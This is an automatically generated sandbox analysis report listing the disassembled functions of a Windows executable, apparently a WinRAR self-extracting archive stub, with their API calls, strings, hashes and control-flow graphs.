    • Instruction Fuzzy Hash: 8BA2F871A04245AEDF65DF64C895BFEBBF4BF05300F0841B9EA499B243DB349A44CBA1
    Function 000D91A0 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • GetCurrentProcess.KERNEL32(?,?,000D9176,?,000ED570,0000000C,000D92CD,?,00000002,00000000), ref: 000D91C1
    • TerminateProcess.KERNEL32(00000000,?,000D9176,?,000ED570,0000000C,000D92CD,?,00000002,00000000), ref: 000D91C8
    • ExitProcess.KERNEL32 ref: 000D91DA
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Process$CurrentExitTerminate
    • String ID:
    • API String ID: 1703294689-0
    • Opcode ID: 86420125a52c4dc5f8de47de534bc4b6a8f4bfe2b8ad46210b29b6efc8d94a72
    • Instruction ID: fdd141ce47e840809e994bd6ae2111c2fb41d6f1c379228a45ec97756a313062
    • Opcode Fuzzy Hash: 86420125a52c4dc5f8de47de534bc4b6a8f4bfe2b8ad46210b29b6efc8d94a72
    • Instruction Fuzzy Hash: 37E04636000248ABDF116FA0DD48A987B7AEB80741B004425F9089A222CB39DD82CA60
    Function 000CB0BE Relevance: 3.1, APIs: 2, Instructions: 77comCOMMON
    Download Yara Rule
    APIs
    • CLSIDFromString.COMBASE(?,?), ref: 000CB0CF
    • CoCreateInstance.COMBASE(?,00000000,00000005,000E64FC,?), ref: 000CB0E6
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: CreateFromInstanceString
    • String ID:
    • API String ID: 432265043-0
    • Opcode ID: 0319f1c5f2fc55088c63e350967d8ab8575af5015931ee68b2ee571c150ee1c3
    • Instruction ID: 636b33b10a16ea4301b2e4d5cd202a873a068e5d123fa79155b2d0e489cb281e
    • Opcode Fuzzy Hash: 0319f1c5f2fc55088c63e350967d8ab8575af5015931ee68b2ee571c150ee1c3
    • Instruction Fuzzy Hash: C5213C75A00514EFEB04DF68DC99D9E7BB9EF48745B00005AFA06EB260DB71AD42CF90
    Function 000CB080 Relevance: 3.0, APIs: 2, Instructions: 25nativeCOMMON
    Download Yara Rule
    APIs
    • SetWindowLongW.USER32(?,000000EB), ref: 000CB098
    • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 000CB0B3
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Window$LongNtdllProc_
    • String ID:
    • API String ID: 2044268144-0
    • Opcode ID: a7a39acfdf646812953a98cd49a75f851f5ab866b96511b8d06acdb7608423e5
    • Instruction ID: 031e4a49fe7ef5745a71d4e34a21f9ab462aab703b5824d1ba1a44ec7bbe2281
    • Opcode Fuzzy Hash: a7a39acfdf646812953a98cd49a75f851f5ab866b96511b8d06acdb7608423e5
    • Instruction Fuzzy Hash: A8E0E536100118BB8F129F99DD08DCE3FAAEF8A770B008015FA1956161C771A961EBA0
    Function 000C7DCC Relevance: .3, Instructions: 343COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: 5dfbeca1dd04a9b8db75c6c144f931a59d91cecb2c69f2ba26366e9e33fb708d
    • Instruction ID: 85609b439a977cf9e335788a3f3f346aa78112611aa2c4e9afdd9616d2192c39
    • Opcode Fuzzy Hash: 5dfbeca1dd04a9b8db75c6c144f931a59d91cecb2c69f2ba26366e9e33fb708d
    • Instruction Fuzzy Hash: 39D19371A083448FDB24CF28C884B9EBBE5BF99308F08456DEC8997342D774E945CB5A
    Function 000CC9C0 Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 734windowfilesleepCOMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 000CC9C5
      • Part of subcall function 000B12F6: GetParent.USER32(?), ref: 000B132A
      • Part of subcall function 000B12F6: GetDlgItem.USER32(00000000,00003021), ref: 000B133A
      • Part of subcall function 000B12F6: SetWindowTextW.USER32(00000000,000E45F4), ref: 000B1350
    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 000CCAB1
    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 000CCACF
    • IsDialogMessageW.USER32(?,?), ref: 000CCAE2
    • TranslateMessage.USER32(?), ref: 000CCAF0
    • DispatchMessageW.USER32(?), ref: 000CCAFA
    • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 000CCB1D
    • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 000CCB40
    • GetDlgItem.USER32(?,00000068), ref: 000CCB63
    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 000CCB7E
    • SendMessageW.USER32(00000000,000000C2,00000000,000E45F4), ref: 000CCB91
      • Part of subcall function 000CE586: _wcslen.LIBCMT ref: 000CE5B0
    • SetFocus.USER32(00000000), ref: 000CCB98
    • _swprintf.LIBCMT ref: 000CCBF7
      • Part of subcall function 000B4A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000B4A33
    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 000CCC5A
    • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 000CCC82
    • GetTickCount.KERNEL32 ref: 000CCCA0
    • _swprintf.LIBCMT ref: 000CCCB8
    • GetLastError.KERNEL32(?,00000011), ref: 000CCCEA
    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 000CCD3D
    • _swprintf.LIBCMT ref: 000CCD74
    • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007402,winrarsfxmappingfile.tmp), ref: 000CCDC8
    • GetCommandLineW.KERNEL32 ref: 000CCDDE
    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,00101482,00000400,00000001,00000001), ref: 000CCE35
    • Sleep.KERNEL32(00000064), ref: 000CCEA5
    • UnmapViewOfFile.KERNEL32(?,?,0000421C,00101482,00000400), ref: 000CCECE
    • CloseHandle.KERNEL32(00000000), ref: 000CCED7
    • _swprintf.LIBCMT ref: 000CCF0A
    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 000CCF69
    • SetDlgItemTextW.USER32(?,00000065,000E45F4), ref: 000CCF80
    • GetDlgItem.USER32(?,00000065), ref: 000CCF89
    • GetWindowLongW.USER32(00000000,000000F0), ref: 000CCF98
    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 000CCFA7
    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 000CD054
    • _wcslen.LIBCMT ref: 000CD0AA
    • _swprintf.LIBCMT ref: 000CD0D4
    • SendMessageW.USER32(?,00000080,00000001,?), ref: 000CD11E
    • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 000CD138
    • GetDlgItem.USER32(?,00000068), ref: 000CD141
    • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 000CD157
    • GetDlgItem.USER32(?,00000066), ref: 000CD171
    • SetWindowTextW.USER32(00000000,0010389A), ref: 000CD193
    • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 000CD1F3
    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 000CD206
    • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001C7A0,00000000,?), ref: 000CD2A9
    • EnableWindow.USER32(00000000,00000000), ref: 000CD383
    • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 000CD3C5
      • Part of subcall function 000CD872: __EH_prolog.LIBCMT ref: 000CD877
    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 000CD3E9
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Item$MessageText$Send$Window_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableFocusHandleLineMappingModuleNameParamParentSleepTickTranslateUnmapUser__vswprintf_c_l
    • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
    • API String ID: 3593385084-1645151803
    • Opcode ID: f697cee161d1c47631dfa50ac16bd828d595b03e5f6a6aa4af52100db1445c3f
    • Instruction ID: e8483560e823dc3b7821a8167302877201923f453b3ef606e0df36e5ec0cf5fc
    • Opcode Fuzzy Hash: f697cee161d1c47631dfa50ac16bd828d595b03e5f6a6aa4af52100db1445c3f
    • Instruction Fuzzy Hash: FB420970A44244BEFB219BA0DD4AFFE77BCAB11700F04416AF645B64D2CBB45E84DB62
    Function 000C1B7C Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316libraryfileloaderCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 274 c1b7c-c1b9f call cffc0 GetModuleHandleW 277 c1c00-c1e61 274->277 278 c1ba1-c1bb8 GetProcAddress 274->278 281 c1f2d-c1f59 GetModuleFileNameW call bd6a7 call c1928 277->281 282 c1e67-c1e72 call d89de 277->282 279 c1bba-c1bd0 278->279 280 c1bd2-c1be2 GetProcAddress 278->280 279->280 283 c1bfe 280->283 284 c1be4-c1bf9 280->284 296 c1f5b-c1f67 call bc619 281->296 282->281 290 c1e78-c1ea6 GetModuleFileNameW CreateFileW 282->290 283->277 284->283 293 c1ea8-c1eb4 SetFilePointer 290->293 294 c1f21-c1f28 CloseHandle 290->294 293->294 297 c1eb6-c1ed2 ReadFile 293->297 294->281 303 c1f69-c1f74 call c1b34 296->303 304 c1f96-c1fbd call bd71d GetFileAttributesW 296->304 297->294 300 c1ed4-c1ef9 297->300 302 c1f16-c1f1f call c1697 300->302 302->294 311 c1efb-c1f15 call c1b34 302->311 303->304 313 c1f76-c1f94 CompareStringW 303->313 314 c1fbf-c1fc3 304->314 315 c1fc7 304->315 311->302 313->304 313->314 314->296 317 c1fc5 314->317 318 c1fc9-c1fce 315->318 317->318 319 c2005-c2007 318->319 320 c1fd0 318->320 321 c200d-c2024 call bd6f1 call bc619 319->321 322 c2114-c211e 319->322 323 c1fd2-c1ff9 call bd71d GetFileAttributesW 320->323 333 c208c-c20bf call b4a20 AllocConsole 321->333 334 c2026-c2087 call c1b34 * 2 call bf937 call b4a20 call bf937 call cb7e4 321->334 328 c1ffb-c1fff 323->328 329 c2003 323->329 328->323 331 c2001 328->331 329->319 331->319 339 c210c-c210e ExitProcess 333->339 340 c20c1-c2106 GetCurrentProcessId AttachConsole call d4f93 GetStdHandle WriteConsoleW Sleep FreeConsole 333->340 334->339 340->339
    APIs
    • GetModuleHandleW.KERNEL32(kernel32), ref: 000C1B95
    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 000C1BA7
    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 000C1BD8
    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 000C1E82
    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000C1E9C
    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 000C1EAC
    • ReadFile.KERNEL32(00000000,?,00007FFE,000E4D24,00000000), ref: 000C1ECA
    • CloseHandle.KERNEL32(00000000), ref: 000C1F22
    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 000C1F37
    • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,000E4D24,?,00000000,?,00000800), ref: 000C1F8B
    • GetFileAttributesW.KERNEL32(?,?,000E4D24,00000800,?,00000000,?,00000800), ref: 000C1FB5
    • GetFileAttributesW.KERNEL32(?,?,000E4DEC,00000800), ref: 000C1FF1
      • Part of subcall function 000C1B34: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 000C1B4F
      • Part of subcall function 000C1B34: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,000C0633,Crypt32.dll,00000000,000C06AD,00000200,?,000C0690,00000000,00000000,?), ref: 000C1B71
    • _swprintf.LIBCMT ref: 000C2063
    • _swprintf.LIBCMT ref: 000C20AF
      • Part of subcall function 000B4A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000B4A33
    • AllocConsole.KERNEL32 ref: 000C20B7
    • GetCurrentProcessId.KERNEL32 ref: 000C20C1
    • AttachConsole.KERNEL32(00000000), ref: 000C20C8
    • _wcslen.LIBCMT ref: 000C20DD
    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 000C20EE
    • WriteConsoleW.KERNEL32(00000000), ref: 000C20F5
    • Sleep.KERNEL32(00002710), ref: 000C2100
    • FreeConsole.KERNEL32 ref: 000C2106
    • ExitProcess.KERNEL32 ref: 000C210E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
    • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
    • API String ID: 1207345701-3298887752
    • Opcode ID: 8fd3049383647f3e9c247a51b6be20a9ff7ac925fb3b9e0580b56ad2d42fd43d
    • Instruction ID: 33793d96a8474c3df73ca014511ca409fff0092f18a2fb95172a63340e41dcf7
    • Opcode Fuzzy Hash: 8fd3049383647f3e9c247a51b6be20a9ff7ac925fb3b9e0580b56ad2d42fd43d
    • Instruction Fuzzy Hash: FFD151B14083C49FD7309F52DC88FDFB6E8BB85709F500D2DF685AA251DBB885498B92
    Function 000BED87 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 000BED90
    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 000BEDCC
      • Part of subcall function 000BD6A7: _wcslen.LIBCMT ref: 000BD6AF
      • Part of subcall function 000C1900: _wcslen.LIBCMT ref: 000C1906
      • Part of subcall function 000C2EC2: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,000BCF18,00000000,?,?), ref: 000C2EDE
    • _wcslen.LIBCMT ref: 000BF109
    • __fprintf_l.LIBCMT ref: 000BF23C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
    • API String ID: 566448164-801612888
    • Opcode ID: 56e4761fb3a43d17ce275860e0529853dc82da963d44fd585ee0a225eaa47eb7
    • Instruction ID: fe28a8323e7e4cf7ca7f64816e7038815ba9ac81d943b196a7d09982afdf7308
    • Opcode Fuzzy Hash: 56e4761fb3a43d17ce275860e0529853dc82da963d44fd585ee0a225eaa47eb7
    • Instruction Fuzzy Hash: 6D32D07190025AABCB24EF68CC45BFE77A4FF08710F40456AFA06A7292EB71DD85CB54
    Function 000CAEE5 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 116COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 658 caee5-caf13 ShowWindow call cac14 661 caf1e-caf23 658->661 662 caf15-caf1d call d5209 658->662 664 caf29-caf32 call d8a08 661->664 665 caf25-caf27 661->665 662->661 667 caf33-caf3b 664->667 665->667 670 caf3d-caf3f 667->670 671 caf41-caf4a call d8a08 667->671 672 caf4b-caf75 GetWindowRect GetParent MapWindowPoints 670->672 671->672 674 caf77-caf7a DestroyWindow 672->674 675 caf80-cafc9 GetParent CreateWindowExW 672->675 674->675 677 cb008-cb00a 675->677 678 cafcb-cafce 675->678 680 cb00c-cb018 ShowWindow UpdateWindow 677->680 681 cb01e-cb024 677->681 678->677 679 cafd0-cafd2 678->679 679->681 682 cafd4-cafd7 679->682 680->681 682->681 683 cafd9-cafdc 682->683 683->681 684 cafde-cafec call cad0e 683->684 684->681 687 cafee-cb006 ShowWindow SetWindowTextW call d5209 684->687 687->681
    APIs
    • ShowWindow.USER32(?,00000000), ref: 000CAEFE
      • Part of subcall function 000CAC14: LoadCursorW.USER32(00000000,00007F00), ref: 000CAC4B
      • Part of subcall function 000CAC14: RegisterClassExW.USER32(00000030), ref: 000CAC6C
    • GetWindowRect.USER32(?,?), ref: 000CAF54
    • GetParent.USER32(?), ref: 000CAF62
    • MapWindowPoints.USER32(00000000,00000000), ref: 000CAF6B
    • DestroyWindow.USER32(00000000), ref: 000CAF7A
    • GetParent.USER32(?), ref: 000CAF97
    • CreateWindowExW.USER32(00000000,RarHtmlClassName,00000000,40000000,?,?,?,?,00000000), ref: 000CAFBB
    • ShowWindow.USER32(?,00000005,00000000), ref: 000CAFF1
    • SetWindowTextW.USER32(?,00000000), ref: 000CAFF9
    • ShowWindow.USER32(00000000,00000005), ref: 000CB00F
    • UpdateWindow.USER32(00000000), ref: 000CB018
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Window$Show$Parent$ClassCreateCursorDestroyLoadPointsRectRegisterTextUpdate
    • String ID: RarHtmlClassName
    • API String ID: 3841971108-1658105358
    • Opcode ID: ae490925c7e2ccfe1866ad2dd38a6eab046b8721fbde5f569c580bb183f1e024
    • Instruction ID: fe7e1fe3875a27997044cc93d94774a544791b8a556bb6d6a99d2115bd74c2fe
    • Opcode Fuzzy Hash: ae490925c7e2ccfe1866ad2dd38a6eab046b8721fbde5f569c580bb183f1e024
    • Instruction Fuzzy Hash: D741DC72104208FFCB269F64DD49FAF7BE9EB48305F24865DF84999052DB70D840CB62
    Function 000CE607 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 690 ce607-ce633 call cc748 GetDlgItem 693 ce669-ce6a3 SendMessageW * 2 690->693 694 ce635-ce662 call ca235 ShowWindow SendMessageW * 2 690->694 696 ce6c4-ce6f5 SendMessageW * 3 693->696 697 ce6a5-ce6c0 693->697 694->693 699 ce71a-ce730 SendMessageW 696->699 700 ce6f7-ce714 SendMessageW 696->700 697->696 700->699
    APIs
      • Part of subcall function 000CC748: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 000CC759
      • Part of subcall function 000CC748: KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 000CC76A
      • Part of subcall function 000CC748: IsDialogMessageW.USER32(000103E6,?), ref: 000CC77E
      • Part of subcall function 000CC748: TranslateMessage.USER32(?), ref: 000CC78C
      • Part of subcall function 000CC748: DispatchMessageW.USER32(?), ref: 000CC796
    • GetDlgItem.USER32(00000068,00111CF0), ref: 000CE61B
    • ShowWindow.USER32(00000000,00000005,?,?,00000001,?,?,000CC999,000E60F0,00111CF0,00111CF0,00001000,000F30C4,00000000,?), ref: 000CE643
    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 000CE64E
    • SendMessageW.USER32(00000000,000000C2,00000000,000E45F4), ref: 000CE65C
    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 000CE672
    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 000CE68C
    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 000CE6D0
    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 000CE6DE
    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 000CE6ED
    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 000CE714
    • SendMessageW.USER32(00000000,000000C2,00000000,000E549C), ref: 000CE723
      • Part of subcall function 000CA235: DestroyWindow.USER32(?,00000000,000CE640,?,?,00000001,?,?,000CC999,000E60F0,00111CF0,00111CF0,00001000,000F30C4,00000000,?), ref: 000CA241
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Message$Send$Window$CallbackDestroyDialogDispatchDispatcherItemPeekShowTranslateUser
    • String ID: \
    • API String ID: 3039329835-2967466578
    • Opcode ID: 9c225a9cc58002d7e1fb5210a6b73be74a9f4fc266cbb3802abf7e185e27a8f3
    • Instruction ID: f196c5e5a94a22e8f00acb054cb44005c2c9cac0792eabd8bcb43fed3e429427
    • Opcode Fuzzy Hash: 9c225a9cc58002d7e1fb5210a6b73be74a9f4fc266cbb3802abf7e185e27a8f3
    • Instruction Fuzzy Hash: 9131D3B1245B40BFE302DF30DC4AFAF3FADEB82704F00090DF6A196191C76559048B66
    Function 000DBB0B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
